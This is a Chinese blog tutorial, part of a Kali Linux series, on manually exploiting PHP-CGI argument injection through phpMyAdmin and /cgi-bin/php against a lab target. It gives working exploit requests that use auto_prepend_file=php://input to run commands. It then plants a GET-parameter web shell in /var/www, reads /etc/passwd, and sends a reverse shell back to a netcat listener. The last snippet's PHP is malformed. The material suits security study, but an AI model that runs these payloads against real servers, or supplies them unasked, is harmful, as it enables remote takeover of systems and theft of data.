第十三章—手动漏洞挖掘（一）

最新推荐文章于 2024-06-08 15:57:02 发布

小依真

最新推荐文章于 2024-06-08 15:57:02 发布

阅读量1.2k

点赞数 1

分类专栏： kail

本文链接：https://blog.csdn.net/weixin_43876557/article/details/111477951

版权

kail 专栏收录该内容

55 篇文章 49 订阅

订阅专栏

手动漏洞挖掘（一）

普遍认为linux比windows安全，是因为windows大多是默认安装，就有默认安装漏洞，就可以很容易被利用。

例1

phpMyAdmin/setup 目录
安装在web服务器的web接口的界面，该web界面的作用是通过php的脚本语言去管理安装在服务器上的mysql数据库，如果没有经过合理的配置，就会存在隐患，最明显的就是phpMyAdmin/setup
使用靶机：在这里插入图片描述

靶机环境直接告诉我们有一个phpMyAdmin，实际中是一个应用的界面，没有phpMyAdmin的话，我们可以通过扫描工具或手动爬网的方式探索是否为php环境，如果是php环境，就可以去尝试一下phpMyAdmin目录是否可以访问，再尝试登录，一旦登录进去我们就可以管理数据库了。

phpAdmin/setup目录是不需要通过身份验证就可以直接访问。
在这里插入图片描述
重点：
在早期版本的phpMyAdmin安装包安装完成之后，是有安全漏洞存在的，这个安全漏洞可以通过在url地址里编辑一下，定制一下对服务器发送的指令，定制完成之后，可以通过url地址让它执行一下我们提交给服务器的新的php页面，具体命令大体类似如下：
POST http://10.0.141/phpMyAdmin/?-d+allow_url_include%3d1±d+auto_prepend_file%3dphp://input HTTP/1.1 该指令作用是修改php.ini这个主配置文件，通过修改，就可以执行下面插入的命令：
Host：192.168.20.10

<?php passthru('id'); #id就是指令，例如whoami die(); ?>

POST http://10.0.0.141/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 
Host:10.0.0.141 

<?php 
passthru('id');  
die(); 
?>

将上述例子实践：
先配置浏览器的代理，使用burp的重放功能。
在这里插入图片描述

例2

网页木马来进行shell的获取。

1、在目标服务器上写一个静态的木马页面文件

在例1的基础上进行：

echo "<?php \$cmd=\$_GET["cmd"];system(\$cmd);?>" >/var/www/3.php

POST http://10.0.0.141/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 
Host:10.0.0.141 

<?php 
passthru('echo "<?php \$cmd=\$_GET["cmd"];system(\$cmd);?>" >/var/www/3.php ');  
die(); 
?>

在这里插入图片描述

说明上传成功，然后我们就可以利用。

由此可看到，命令被执行，执行成功。

2、利用1的漏洞产生一个反弹的shell弹到kail本机的侦听端口上

提交给目标服务器一个请求，请求的指令里带有反弹连接的shell，让目标服务器把反弹的shell在自己服务器上执行，执行玩会主动反向连接自己的某一个端口，此时本地只需要开一个侦听的端口，例如nc，去侦听该端口，就可以获得远端目标服务器的shell。
shell的位置在/usr/share/webshells/php
该目录下的php-reverse-shell.php就是反弹shell。
在这里插入图片描述
反弹，需要知道反弹给谁，因此就需要把我们的ip地址写到反弹shell里面。
修改反弹shell：修改ip地

在这里插入图片描述
发送给目标服务器：
将修改后的shell文件3.php中内容全部复制，然后使用POST方法发给目标服务器上。

这样不是在服务器上创建文件，而是把这些命令发给目标服务器，让目标服务器执行。
执行前先侦听端口：

nc -nvvlp 1234

在这里插入图片描述
发送后如下：

对于不能执行的命令，可以通过下面方式查询后并执行，

例3

ubuntu /Debian默认安装PHP5-cgi，不是web目录，而是在操作系统目录中会生成/cgi-bin/php5和/cgi-bin/php两个二进制执行程序。
可直接访问/cgi-bin/php5和/cgi-bin/php（爬不出来的目录）。

POST /cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedr=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
HTTP/1.1
Host：123

<?php
echo system['cat /etc/password'];
?>
#host头不起作用，可以随便写。

但是这一串url需要经过编码，因为服务器有一些过滤机制。

POST /cgi-bin/php?%2d%64%20%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e%20%2d%64%20%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66%20%2d%64%20%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e%20%2d%64%20%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22%20%2d%64%20%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74%20%2d%64%20%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30%20%2d%64%20%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30%20%2d%6e
HTTP/1.1
Host：123

<?php
echo system['cat /etc/password'];
?>